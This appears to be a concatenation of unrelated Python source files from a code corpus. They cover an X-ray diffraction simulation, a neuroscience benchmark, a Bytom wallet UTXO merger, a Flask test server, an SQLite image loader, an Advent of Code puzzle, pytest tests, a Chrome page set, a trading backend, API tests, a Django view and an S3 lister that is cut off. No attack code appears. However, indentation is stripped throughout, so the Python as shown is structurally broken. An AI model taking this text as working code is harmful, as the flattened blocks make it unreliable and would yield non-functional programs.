print("detector_thickstep_mm=",SIM.detector_thickstep_mm)
print("mosaic_spread_deg=",SIM.mosaic_spread_deg)
print("mosaic_domains=",SIM.mosaic_domains)
print("indices=",SIM.indices)
print("amplitudes=",SIM.amplitudes)
print("Fhkl_tuple=",SIM.Fhkl_tuple)
print("default_F=",SIM.default_F)
print("interpolate=",SIM.interpolate)
print("integral_form=",SIM.integral_form)
# modify things that are missing, or not quite right in the header
SIM.close_distance_mm=299.83
SIM.wavelength_A=1.304735
SIM.polarization=0.99
SIM.beamsize_mm=0.03
#SIM.fluence=4.28889e+18
# fluence scaled to make crystal look bigger
SIM.fluence=1.03e+27
SIM.beamcenter_convention=convention.Custom
SIM.beam_center_mm=( 160.53, 182.31 )
SIM.dispersion_pct = 0.5
SIM.dispsteps=6
print("dispsteps=",SIM.dispsteps)
SIM.divergence_hv_mrad = ( 0.02, 0.02 )
SIM.divsteps_hv = ( 2 , 2 )
print(SIM.divsteps_hv)
SIM.round_div=True
print(SIM.divsteps_hv)
#SIM.detector_thick_mm = 0.037
SIM.detector_thick_mm = 0.
SIM.detector_thicksteps = 1
# override mtz unit cell
SIM.unit_cell_tuple = ( 68.78, 169.26, 287.42, 90, 90, 90 )
#SIM.Ncells_abc = ( 1, 1, 1 )
SIM.Ncells_abc = ( 14, 6, 4 )
#SIM.Ncells_abc = ( 35, 15, 10 )
print("Ncells_abc=",SIM.Ncells_abc)
SIM.xtal_shape=shapetype.Tophat
print("xtal_size_mm=",SIM.xtal_size_mm)
SIM.interpolate=0
SIM.progress_meter=True
SIM.mosaic_spread_deg = 0.2
SIM.mosaic_domains = 30
SIM.oversample = 1
SIM.detector_psf_type=shapetype.Fiber
SIM.adc_offset_adu = 10
SIM.readout_noise_adu = 1.5
SIM.show_sources()
# speedups, comment out for realism
if GOFAST:
SIM.divergence_hv_mrad = ( 0,0 )
SIM.dispersion_pct = 0
SIM.mosaic_spread_deg = 0
# set this to 0 or -1 to trigger automatic radius. could be very slow with bright images
SIM.detector_psf_kernel_radius_pixels=5
# use one pixel for diagnostics?
SIM.printout_pixel_fastslow=(1782,1832)
# debug only a little patch
#SIM.region_of_interest=((1450,1850),(1550,1950))
SIM.amorphous_sample_thick_mm = 0.1
SIM.amorphous_density_gcm3 = 7e-7
SIM.amorphous_sample_molecular_weight_Da = 18 # default
# load in the real image so we can extract the background
SIM.raw_pixels = img.get_raw_data().as_double()
#print SIM.Fbg_vs_stol[100]
SIM.extract_background()
#print SIM.Fbg_vs_stol[100]
# maybe edit background trace here?
# or, forget it, reset to old one:
SIM.Fbg_vs_stol = Fbg_vs_stol
# now clear the pixels
SIM.raw_pixels*=0
print("dispsteps=",SIM.dispsteps)
print("divsteps=",SIM.divsteps_hv)
print("oversample=",SIM.oversample)
SIM.add_background(oversample=1,source=0)
print("mid_sample=",SIM.raw_pixels[1782,1832])
print("dispsteps=",SIM.dispsteps)
print("divsteps=",SIM.divsteps_hv)
print("oversample=",SIM.oversample)
SIM.to_smv_format(fileout="intimage_001.img",intfile_scale=1)
# three clusters of mosaic domains
if not GOFAST:
SIM.fluence /= 3
SIM.missets_deg = ( 96.9473, -52.0932, -32.518 )
#SIM.missets_deg = ( 96.544, -51.9673, -32.4243 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_002.img",intfile_scale=1)
SIM.missets_deg = ( 97.5182, -52.3404, -32.7289 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_003.img",intfile_scale=1)
SIM.missets_deg = ( 97.1251, -52.2242, -32.751 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_004.img",intfile_scale=1)
SIM.detector_psf_fwhm_mm=0.08
SIM.detector_psf_type=shapetype.Fiber
# get same noise each time this test is run
SIM.seed = 1
print("seed=",SIM.seed)
print("calib_seed=",SIM.calib_seed)
print("quantum_gain=",SIM.quantum_gain)
print("adc_offset_adu=",SIM.adc_offset_adu)
print("detector_calibration_noise_pct=",SIM.detector_calibration_noise_pct)
print("flicker_noise_pct=",SIM.flicker_noise_pct)
print("readout_noise_adu=",SIM.readout_noise_adu)
print("detector_psf_type=",SIM.detector_psf_type)
print("detector_psf_fwhm_mm=",SIM.detector_psf_fwhm_mm)
print("detector_psf_kernel_radius_pixels=",SIM.detector_psf_kernel_radius_pixels)
SIM.show_params()
SIM.add_noise()
print("raw_pixels=",SIM.raw_pixels)
SIM.to_smv_format(fileout="noiseimage_001.img",intfile_scale=1)
print("mosaic_domains=",SIM.mosaic_domains)
print("mosaic_spread_deg=",SIM.mosaic_spread_deg)
print("dispersion_pct=",SIM.dispersion_pct)
print("dispsteps=",SIM.dispsteps)
print("divergence_hv_mrad=",SIM.divergence_hv_mrad)
print("divergence_hv=",SIM.divsteps_hv)
print("GOT HERE 1")
SIM.verbose=999
SIM.free_all()
print("GOT HERE 2")
| python |
import brainscore
from brainscore.benchmarks._neural_common import NeuralBenchmark, average_repetition
from brainscore.metrics.ceiling import InternalConsistency, RDMConsistency
from brainscore.metrics.rdm import RDMCrossValidated
from brainscore.metrics.regression import CrossRegressedCorrelation, pls_regression, pearsonr_correlation, \
single_regression
from brainscore.utils import LazyLoad
from result_caching import store
VISUAL_DEGREES = 4
NUMBER_OF_TRIALS = 20
def _MovshonFreemanZiemba2013Region(region, identifier_metric_suffix, similarity_metric, ceiler):
assembly_repetition = LazyLoad(lambda region=region: load_assembly(False, region=region))
assembly = LazyLoad(lambda region=region: load_assembly(True, region=region))
return NeuralBenchmark(identifier=f'movshon.FreemanZiemba2013.{region}-{identifier_metric_suffix}', version=2,
assembly=assembly, similarity_metric=similarity_metric, parent=region,
ceiling_func=lambda: ceiler(assembly_repetition),
visual_degrees=VISUAL_DEGREES, number_of_trials=NUMBER_OF_TRIALS,
paper_link='https://www.nature.com/articles/nn.3402')
def MovshonFreemanZiemba2013V1PLS():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='pls',
similarity_metric=CrossRegressedCorrelation(
regression=pls_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V1Single():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='single',
similarity_metric=CrossRegressedCorrelation(
regression=single_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V1RDM():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='rdm',
similarity_metric=RDMCrossValidated(
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=RDMConsistency())
def MovshonFreemanZiemba2013V2PLS():
return _MovshonFreemanZiemba2013Region('V2', identifier_metric_suffix='pls',
similarity_metric=CrossRegressedCorrelation(
regression=pls_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V2RDM():
return _MovshonFreemanZiemba2013Region('V2', identifier_metric_suffix='rdm',
similarity_metric=RDMCrossValidated(
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=RDMConsistency())
@store()
def load_assembly(average_repetitions, region, access='private'):
assembly = brainscore.get_assembly(f'movshon.FreemanZiemba2013.{access}')
assembly = assembly.sel(region=region)
assembly = assembly.stack(neuroid=['neuroid_id']) # work around xarray multiindex issues
assembly['region'] = 'neuroid', [region] * len(assembly['neuroid'])
assembly.load()
time_window = (50, 200)
assembly = assembly.sel(time_bin=[(t, t + 1) for t in range(*time_window)])
assembly = assembly.mean(dim='time_bin', keep_attrs=True)
assembly = assembly.expand_dims('time_bin_start').expand_dims('time_bin_end')
assembly['time_bin_start'], assembly['time_bin_end'] = [time_window[0]], [time_window[1]]
assembly = assembly.stack(time_bin=['time_bin_start', 'time_bin_end'])
assembly = assembly.squeeze('time_bin')
assembly = assembly.transpose('presentation', 'neuroid')
if average_repetitions:
assembly = average_repetition(assembly)
return assembly
| python |
import json, time, argparse, getpass, re, requests
try:
input = raw_input
except NameError:
pass
parser = argparse.ArgumentParser(description='Bytom UTXO Tool')
parser.add_argument('-o', '--url', default='http://127.0.0.1:9888', dest='endpoint', help='API endpoint')
parser.add_argument('--http-user', default=None, dest='http_user', help='HTTP Basic Auth Username')
parser.add_argument('--http-pass', default=None, dest='http_pass', help='HTTP Basic Auth Password')
parser.add_argument('--cert', default=None, dest='https_cert', help='HTTPS Client Certificate')
parser.add_argument('--key', default=None, dest='https_key', help='HTTPS Client Key')
parser.add_argument('--ca', default=None, dest='https_ca', help='HTTPS CA Certificate')
parser.add_argument('--no-verify', action='store_true', dest='https_verify', help='Do not verify HTTPS server certificate')
parser.add_argument('-p', '--pass', default=None, dest='bytom_pass', help='Bytom Account Password')
parser.add_argument('-l', '--list', action='store_true', dest='only_list', help='Show UTXO list without merge')
parser.add_argument('-m', '--merge', default=None, dest='merge_list', help='UTXO to merge')
parser.add_argument('-a', '--address', default=None, dest='address', help='Transfer address')
parser.add_argument('-y', '--yes', action='store_true', dest='confirm', help='Confirm transfer')
class BytomException(Exception):
pass
class JSONRPCException(Exception):
pass
class Callable(object):
def __init__(self, name, func):
self.name = name
self.func = func
def __call__(self, *args, **kwargs):
return self.func(self.name, *args, **kwargs)
class JSONRPC(object):
def __init__(self, endpoint, httpverb='POST', **kwargs):
self.url = endpoint.rstrip('/')
self.httpverb = httpverb
self.kwargs = kwargs
def __getattr__(self, name):
return Callable(name.replace('_', '-'), self.callMethod)
def callMethod(self, method, params={}):
m = requests.request(self.httpverb, '{}/{}'.format(self.url, method), json=params, **self.kwargs)
data = m.json()
if data.get('status') == 'success':
return data['data']
raise JSONRPCException(data.get('msg') or data.get('message') or str(data))
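# Usage sketch: attribute access maps underscores to hyphens, so
# JSONRPC('http://127.0.0.1:9888').get_block_count() POSTs to /get-block-count.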
def send_tx(bytomd, utxo_list, to_address, password):
actions = []
amount = 0
for utxo in utxo_list:
actions.append({
'type': 'spend_account_unspent_output',
'output_id': utxo['id'],
})
amount += utxo['amount']
actions.append({
'amount': amount,
'asset_id': 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff',
'type': 'control_address',
'address': to_address,
})
transaction = bytomd.build_transaction({
'base_transaction' : None,
'actions' : actions,
'ttl' : 1
})
gas_info = bytomd.estimate_transaction_gas({
'transaction_template': transaction
})
fee = gas_info['total_neu']
actions[-1]['amount'] -= fee
time.sleep(1)
transaction = bytomd.build_transaction({
'base_transaction': None,
'actions': actions,
'ttl': 1,
})
signed_transaction = bytomd.sign_transaction({
'transaction': transaction,
'password': password,
})
if signed_transaction['sign_complete']:
raw_transaction = signed_transaction['transaction']['raw_transaction']
result = bytomd.submit_transaction({'raw_transaction': raw_transaction})
return result['tx_id']
else:
raise BytomException('Sign not complete')
def parse_id_list(id_list_str, list_all):
for id_str in id_list_str.split(','):
id_ = id_str.strip()
if not id_:
pass
elif id_.strip().lower() == 'all':
for i in list_all:
yield i
return
elif re.match(r'(\d+)-(\d+)', id_):
start, end = re.match(r'(\d+)-(\d+)', id_).groups()
for i in range(int(start), int(end) + 1):
yield i
elif not id_.strip().isdigit():
print('Ignored: Incorrect index {}'.format(id_))
else:
idx = int(id_.strip())
yield idx
def main():
options = parser.parse_args()
api_params = {}
if options.http_user and options.http_pass:
api_params['auth'] = (options.http_user, options.http_pass)
if options.https_cert:
if options.https_key:
api_params['cert'] = (options.https_cert, options.https_key)
else:
api_params['cert'] = options.https_cert
if options.https_ca:
api_params['verify'] = options.https_ca
elif options.https_verify:
api_params['verify'] = False
bytomd = JSONRPC(options.endpoint, **api_params)
utxolist = bytomd.list_unspent_outputs()
current_block = bytomd.get_block_count()['block_count']
for i, utxo in enumerate(utxolist):
print('{:4}. {:13.8f} BTM {}{}'.format(i, utxo['amount'] / 1e8, utxo['id'], ' (not mature)' if utxo['valid_height'] > current_block else ''))
if options.only_list:
return
utxo_idlist = options.merge_list or input('Merge UTXOs (1,3,5 or 1-10 or all): ')
utxo_mergelist = []
utxo_idset = set()
for idx in parse_id_list(utxo_idlist, range(len(utxolist))):
if idx in utxo_idset:
print('Ignored: Duplicate index {}'.format(idx))
elif not 0 <= idx < len(utxolist):
print('Ignored: Index out of range {}'.format(idx))
elif utxolist[idx]['valid_height'] > current_block:
print('Ignored: UTXO[{}] not mature'.format(idx))
else:
utxo_mergelist.append(utxolist[idx])
utxo_idset.add(idx)
if len(utxo_mergelist) < 2:
print('Not Merge UTXOs, Exit...')
return
print('To merge {} UTXOs with {:13.8f} BTM'.format(len(utxo_mergelist), sum(utxo['amount'] for utxo in utxo_mergelist) / 1e8))
if not options.address:
options.address = input('Transfer Address: ')
if not options.bytom_pass:
options.bytom_pass = getpass.getpass('Bytom Account Password: ')
if not (options.confirm or input('Confirm [y/N] ').lower() == 'y'):
print('Not Merge UTXOs, Exit...')
return
print(send_tx(bytomd, utxo_mergelist, options.address, options.bytom_pass))
if __name__ == '__main__':
main()
| python |
S = set()
S.add(5)
S.add(3)
S.add(1)
# Prints out the numbers 5, 3, 1 in no particular order
for element in S:
print "{} is in the set".format(element)
S.remove(3)
S.remove(5)
S.remove(1)
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module serving all the traffic for javascript test cases."""
import os
from flask import abort
from flask import Blueprint
from flask import make_response
from flask import render_template
from flask import Response
from flask import send_from_directory
from flask import url_for
javascript_module = Blueprint(
"javascript_module", __name__, template_folder="templates")
# Global app.instance_path is not accessible from blueprints ¯\_(ツ)_/¯.
TEST_CASES_PATH = os.path.abspath(__file__ + "/../../../test-cases/javascript/")
@javascript_module.route("/misc/comment.js")
def comment():
content = "// " + url_for(
"index", _external=True) + "test/javascript/misc/comment.found"
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/misc/string-variable.js")
def string_variable():
content = "var url = \"" + url_for(
"index", _external=True) + "test/javascript/misc/string-variable.found\";"
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/frameworks/angular/")
def angular_root():
# Redirect straight to the Angular app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/angular/index.html"
return r
@javascript_module.route("/frameworks/polymer/")
def polymer_root():
# Redirect straight to the Polymer app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/polymer/index.html"
return r
@javascript_module.route("/frameworks/react/")
def react_root():
# Redirect straight to the React app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/react/index.html"
return r
@javascript_module.route("/misc/string-concat-variable.js")
def string_concat_variable():
content = "var domain = \"" + url_for(
"index", _external=True
) + ("\";var path = \"test/javascript/misc/string-concat-variable.found\";var"
" full = domain + path;")
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/", defaults={"path": ""})
@javascript_module.route("/<path:path>")
def html_dir(path):
"""Lists contents of requested directory."""
requested_path = os.path.join(TEST_CASES_PATH, path)
if not os.path.exists(requested_path):
return abort(404)
if os.path.isdir(requested_path):
files = os.listdir(requested_path)
return render_template("list-javascript-dir.html", files=files, path=path)
if os.path.isfile(requested_path):
return send_from_directory("test-cases/javascript", path)
| python |
import sqlite3
import os.path
from os import listdir, getcwd
import sys
from os import listdir
from os.path import isfile, join
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
db_dir = os.path.join(BASE_DIR,"sql/")
img_dir = os.path.join(BASE_DIR,"images/")
full_dir = lambda x,y: x+y
known_faces_imgs = full_dir(img_dir,'known_faces/')
new_faces_imgs = full_dir(img_dir,'new_faces/')
imgs1 = [f for f in listdir(known_faces_imgs) if isfile(join(known_faces_imgs, f))]
imgs2 = [f for f in listdir(new_faces_imgs) if isfile(join(new_faces_imgs, f))]
# downloaded 2 images for testing
'''
import urllib.request
def store_image(url, local_file_name):
with urllib.request.urlopen(url) as resource:
with open(local_file_name, 'wb') as f:
f.write(resource.read())
store_image('https://upload.wikimedia.org/wikipedia/commons/2/25/Chris_Evans_SDCC_2014.jpg',
'1.jpg')
store_image('https://img.buzzfeed.com/buzzfeed-static/static/2018-01/11/18/campaign_images/buzzfeed-prod-fastlane-01/chris-evans-uses-nothing-on-his-beard-its-just-th-2-20079-1515714803-5_dblbig.jpg',
'2.jpg')
'''
def codb(db_file):
db_file = full_dir(db_dir,db_file)
print(db_file)
db_is_new = not os.path.exists(db_file)
conn = sqlite3.connect(db_file)
if db_is_new:
print (db_file,"DONE")
sql = "create table if not exists elements ("
sql +="ID INTEGER PRIMARY KEY AUTOINCREMENT,"
sql+="IMAGE BLOB,TYPE TEXT,NOM TEXT);"
conn.execute(sql)
else:
print ("Schema exists")
return conn
def insert_picture(db,imgs):
conn = codb(db)
for i in imgs:
picture_file=full_dir(full_dir(img_dir,db+"/"),i)
with open(picture_file, 'rb') as input_file:
ablob = input_file.read()
base=os.path.basename(picture_file)
afile, ext = os.path.splitext(base)
sql = "INSERT INTO elements"
sql+="(IMAGE, TYPE,NOM) VALUES(?, ?,?);"
conn.execute(sql,[sqlite3.Binary(ablob), ext, afile])
conn.commit()
conn.close()
def make_new():
#db1
insert_picture('known_faces',imgs1)
#db2
insert_picture('new_faces',imgs2)
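if __name__ == '__main__':
# Hypothetical entry point: the original module defines make_new() but never calls it.
make_new()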
| python |
data = open('data/input6.txt', 'r')
orbs = data.readlines()
d = {}
for orb in orbs:
c1 = orb[:3]
c2 = orb[4:7]
d[c2] = c1
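# Part 1: count direct and indirect orbits by walking each object up to the root.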
s = 0
for p in d:
curr_p = p
while curr_p in d:
curr_p = d[curr_p]
s += 1
print(s)
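# Part 2: walk YOU up to the root, then walk SAN up until the paths meet; the
# transfer count is the sum of both distances to that common ancestor.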
trajet_you = []
curr = 'YOU'
while True:
if curr not in d: break
curr = d[curr]
trajet_you += [curr]
i = 0
curr = 'SAN'
while True:
i += 1
curr = d[curr]
if curr in trajet_you:break
print(trajet_you.index(curr) + i - 1) | python |
#! /usr/bin/env python
#
# Check the option usage.
# Make sure the union member matches the option type.
#
import sys, os, fnmatch
# just use the first letter of the member name - should be unique
opt_suffix = {
'b' : 'AT_BOOL',
'a' : 'AT_IARF',
'n' : 'AT_NUM',
'l' : 'AT_LINE',
't' : 'AT_POS'
}
opts = { }
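# check_file scans one source file for 'cpd.settings[UO_XXX].m' accesses and reports
# members whose one-letter suffix disagrees with the option type registered in opts.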
def check_file (fn):
problems = 0
fd = open(fn, 'r')
line_no = 0
for line in fd:
line_no = line_no + 1
cpd = line.find('cpd.settings[UO_')
if cpd > 0:
sb = line[cpd:].find(']')
opt = line[cpd + 13 : cpd + sb]
mem = line[cpd + sb + 2]
if opt in opts and mem in opt_suffix:
if opts[opt] != opt_suffix[mem]:
print fn + '[%d]' % line_no, opt, 'should use', opts[opt], 'not', opt_suffix[mem]
problems += 1
return problems
def main (argv):
# Read in all the options
of = open(os.path.join('src', 'options.cpp'), 'r')
for line in of:
if line.find('unc_add_option') > 0 and line.find('UO_') > 0:
ps = line.split(',')
if len(ps) >= 3:
opts[ps[1].strip()] = ps[2].strip()
of.close()
# Get a list of all the source files
ld = os.listdir('src')
src_files = fnmatch.filter(ld, '*.cpp')
src_files.extend(fnmatch.filter(ld, '*.h'))
# Check each source file
problems = 0
for fn in src_files:
problems += check_file(os.path.join('src', fn))
if problems == 0:
print 'No problems found'
if __name__ == '__main__':
main(sys.argv)
| python |
from pathlib import Path
import pytest
from md_translate.exceptions import ObjectNotFoundException, FileIsNotMarkdown
from md_translate.files_worker import FilesWorker
TEST_FIRST_FILE = 'tests/test_data/md_files_folder/first_file.md'
TEST_SECOND_FILE = 'tests/test_data/md_files_folder/second_file.md'
class SettingsMock:
def __init__(self, path):
self.path = Path('tests/test_data').joinpath(path)
class TestFilesWorker:
@pytest.mark.parametrize('path, err', [
['not existing folder', ObjectNotFoundException],
['folder_without_md_files', FileNotFoundError],
['not_a_folder', FileIsNotMarkdown],
['not_markdown_file.txt', FileIsNotMarkdown],
])
def test_folder_errors(self, path, err):
with pytest.raises(err):
FilesWorker(SettingsMock(path)).get_md_files()
def test_multiple_objects(self):
file_worker_object = FilesWorker(SettingsMock('md_files_folder'))
assert file_worker_object.single_file == False
assert sorted(file_worker_object.get_md_files()) == [Path(TEST_FIRST_FILE), Path(TEST_SECOND_FILE)]
def test_single_object(self):
file_worker_object = FilesWorker(SettingsMock('md_files_folder/first_file.md'))
assert file_worker_object.single_file == True
assert file_worker_object.get_md_files() == [Path(TEST_FIRST_FILE)]
| python |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page as page_module
from telemetry.page import page_set as page_set_module
class Top20Page(page_module.Page):
def __init__(self, url, page_set, name=''):
super(Top20Page, self).__init__(url=url, page_set=page_set, name=name)
self.archive_data_file = '../data/chrome_proxy_top_20.json'
class Top20PageSet(page_set_module.PageSet):
""" Pages hand-picked for Chrome Proxy tests. """
def __init__(self):
super(Top20PageSet, self).__init__(
archive_data_file='../data/chrome_proxy_top_20.json')
# Why: top google property; a google tab is often open
self.AddPage(Top20Page('https://www.google.com/#hl=en&q=barack+obama',
self))
# Why: #3 (Alexa global)
self.AddPage(Top20Page('http://www.youtube.com', self))
# Why: #18 (Alexa global), Picked an interesting post
self.AddPage(Top20Page(
# pylint: disable=C0301
'http://en.blog.wordpress.com/2012/09/04/freshly-pressed-editors-picks-for-august-2012/',
self, 'Wordpress'))
# Why: top social, Public profile
self.AddPage(Top20Page('http://www.facebook.com/barackobama', self,
'Facebook'))
# Why: #12 (Alexa global), Public profile
self.AddPage(Top20Page('http://www.linkedin.com/in/linustorvalds', self,
'LinkedIn'))
# Why: #6 (Alexa) most visited worldwide, Picked an interesting page
self.AddPage(Top20Page('http://en.wikipedia.org/wiki/Wikipedia', self,
'Wikipedia (1 tab)'))
# Why: #8 (Alexa global), Picked an interesting page
self.AddPage(Top20Page('https://twitter.com/katyperry', self, 'Twitter'))
# Why: #37 (Alexa global)
self.AddPage(Top20Page('http://pinterest.com', self, 'Pinterest'))
# Why: #1 sports
self.AddPage(Top20Page('http://espn.go.com', self, 'ESPN'))
# Why: #1 news worldwide (Alexa global)
self.AddPage(Top20Page('http://news.yahoo.com', self))
# Why: #2 news worldwide
self.AddPage(Top20Page('http://www.cnn.com', self))
# Why: #7 (Alexa news); #27 total time spent, Picked interesting page
self.AddPage(Top20Page(
'http://www.weather.com/weather/right-now/Mountain+View+CA+94043',
self, 'Weather.com'))
# Why: #1 world commerce website by visits; #3 commerce in the US by time
# spent
self.AddPage(Top20Page('http://www.amazon.com', self))
# Why: #1 commerce website by time spent by users in US
self.AddPage(Top20Page('http://www.ebay.com', self))
# Why: #1 games according to Alexa (with actual games in it)
self.AddPage(Top20Page('http://games.yahoo.com', self))
# Why: #1 Alexa recreation
self.AddPage(Top20Page('http://booking.com', self))
# Why: #1 Alexa reference
self.AddPage(Top20Page('http://answers.yahoo.com', self))
# Why: #1 Alexa sports
self.AddPage(Top20Page('http://sports.yahoo.com/', self))
# Why: top tech blog
self.AddPage(Top20Page('http://techcrunch.com', self))
self.AddPage(Top20Page('http://www.nytimes.com', self))
| python |
# -*- coding: utf-8 -*-
##
# @file backend.py
# @brief
# @author wondereamer
# @version 0.5
# @date 2016-07-10
from quantity.digger.event.rpc import EventRPCServer
from quantity.digger.event.eventengine import ZMQEventEngine
from quantity.digger.interaction.interface import BackendInterface
from quantity.digger.util import mlogger as log
from quantity.digger.datasource.data import DataManager
from quantity.digger.datastruct import PContract
from quantity.digger.interaction.serialize import (
serialize_pcontract_bars,
serialize_all_pcontracts,
serialize_all_contracts,
)
class Backend(BackendInterface):
## @TODO singleton
SERVER_FOR_UI = 'backend4ui'
SERVER_FOR_SHELL = "backend4shell"
def __init__(self):
log.info("Init Backend..")
self._engine = ZMQEventEngine('Backend')
self._engine.start()
self._shell_srv = EventRPCServer(self._engine,
self.SERVER_FOR_SHELL)
self._ui_srv = EventRPCServer(self._engine,
self.SERVER_FOR_UI)
self.register_functions(self._shell_srv)
self.register_functions(self._ui_srv)
def register_functions(self, server):
server.register('get_all_contracts', self.get_all_contracts)
server.register('get_all_pcontracts', self.get_all_pcontracts)
server.register('get_pcontract', self.get_pcontract)
server.register('get_strategies', self.get_strategies)
server.register('run_strategy', self.run_strategy)
server.register('run_technical', self.run_technical)
def stop(self):
log.info('Backend stopped.')
self._engine.stop()
def get_all_contracts(self):
# mock interface
data = ['CC.SHFE-1.MINUTE', 'BB.SHFE-1.MINUTE']
pcons = [PContract.from_string(d) for d in data]
contracts = [pcon.contract for pcon in pcons]
return serialize_all_contracts(contracts)
def get_all_pcontracts(self):
# mock interface
data = ['CC.SHFE-1.MINUTE', 'BB.SHFE-1.MINUTE']
pcontracts = [PContract.from_string(d) for d in data]
return serialize_all_pcontracts(pcontracts)
def get_pcontract(self, str_pcontract):
dm = DataManager()
da = dm.get_bars(str_pcontract)
return serialize_pcontract_bars(str_pcontract, da.data)
def run_strategy(self, name):
""""""
return
def run_technical(self, name):
return
def get_technicals(self):
""" 获取系统的所有指标。 """
from quantity.digger.technicals import get_techs
return get_techs()
def get_strategies(self):
return 'hello'
#backend.get_all_contracts()
#backend.get_pcontract('BB.TEST-1.MINUTE')
if __name__ == '__main__':
backend = Backend()
import time, sys
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
backend.stop()
sys.exit(0)
| python |
#%% Test Module
from pyCMC import CMC
def test_results(returnVal, tname):
if 'status' in returnVal.keys():
if returnVal['status']['error_code'] == 0:
print('{} works!'.format(tname))
else:
print('Error message: {}'.format(returnVal['status']['error_message']))
else:
print(returnVal)
with open('./cmc_key.key', 'r') as f:
cmc_key = f.readline().strip()
cmc = CMC(cmc_key)
# Map
map_data = cmc.map()
test_results(map_data, 'Map')
# Metadata
meta_data = cmc.metadata(slug='bitcoin,ethereum,litecoin')
test_results(meta_data, 'Metadata')
# Listings
listings = cmc.listings(start=1, limit=5, convert='EUR', convert_id=None, sort='market_cap')
test_results(listings, 'Listings')
# Quotes
quotes = cmc.quotes(coinId=None, slug='ethereum')
test_results(quotes, 'Quotes')
# Global Metrics
metrics = cmc.global_metrics()
test_results(metrics, 'Metrics')
# Convert Price
convert = cmc.convert_price(2, coinId=None, symbol='ETH', convert='USD')
test_results(convert, 'Convert')
# These should return errors before calling the API
print('\nThe remaining functions should all return errors.\n')
# Listings
err_listings = cmc.listings(start=1, limit='10', convert='EUR', convert_id=None, sort='market_cap')
test_results(err_listings, 'Error Listings')
# Quotes
err_quotes = cmc.quotes(coinId=None, slug=None)
test_results(err_quotes, 'Error Quotes')
# Convert Price
err_convert = cmc.convert_price(1.5e9, coinId=None, symbol='ETH', convert='USD')
test_results(err_convert, 'Convert')
| python |
from django.http import HttpResponse, HttpRequest, HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.core.context_processors import csrf
from django.conf import settings
from django.contrib.auth.models import User, Group
from reports.models import BusinessUnit, Machine
from guardian.shortcuts import get_objects_for_user
try:
BUSINESS_UNITS_ENABLED = settings.BUSINESS_UNITS_ENABLED
except AttributeError:
BUSINESS_UNITS_ENABLED = False
PROJECT_DIR = settings.PROJECT_DIR
def index(request):
#business_units = BusinessUnit.objects.all()
business_units = get_objects_for_user(request.user, 'reports.can_view_businessunit')
with open(PROJECT_DIR + "/../version", 'r') as handle:
version = handle.read()
return {'business_units_enabled': BUSINESS_UNITS_ENABLED,
'business_units': business_units,
'webadmin_version': version} | python |
#!/Users/juan/venv-3.8.6/bin/python3.8
# Copyright 2020 Telleztec.com, Juan Tellez, All Rights Reserved
#
import boto3
import datetime
import argparse
# convert bytes to kb, mb, and gb
def to_units(b, unit):
if unit=='b':
return b
elif unit=='k':
return round(b/1000, 2)
elif unit=='m':
return round(b/(1000*1000), 2)
elif unit=='g':
return round(b/(1000*1000*1000), 2)
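# e.g. to_units(1500000, 'm') -> 1.5; units are decimal (1000-based), not binary.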
# list_buckets prints the name of all buckets and the creation time
def list_buckets(s3):
for bucket in s3.buckets.all():
d = bucket.creation_date
print('{:<30s}{:>52s}'.format(
bucket.name, d.isoformat(' ')))
# list_bucket_usage prints all buckets, date of the newst object and the total disk used
def list_bucket_usage(s3, unit):
totalSizeBytes = 0
for bucket in s3.buckets.all():
d = bucket.creation_date
newest = datetime.datetime(datetime.MINYEAR,1,1,tzinfo=datetime.timezone.utc)
for obj in bucket.objects.all():
totalSizeBytes += obj.size
if newest < obj.last_modified:
newest = obj.last_modified
print('{:<30s} {:s} {:s} {:>16.2f}'.format(bucket.name, d.isoformat(' '), newest.isoformat(' '),
to_units(totalSizeBytes, unit)))
# list_files prints all the objects in a bucket.
def list_files(s3, unit):
totalSizeBytes = 0
for bucket in s3.buckets.all():
for obj in bucket.objects.all():
d = obj.last_modified
print('{:<30s}{:>52s} {:>10f}'.format(
bucket.name, d.isoformat(' '), to_units(obj.size, unit)))
def main():
parser = argparse.ArgumentParser(prog='s3ls')
parser.add_argument('--region', nargs=1, default=['us-east-1'],  # list, so region[0] below works with nargs=1
help='AWS region, e.g. us-east-1')
parser.add_argument('--unit', choices=['b','k','m', 'g'], default='b',
help='Unit to display disk usage in: b, k, m or g')
parser.add_argument('do', choices=['space', 'files', 'buckets'], default='space',
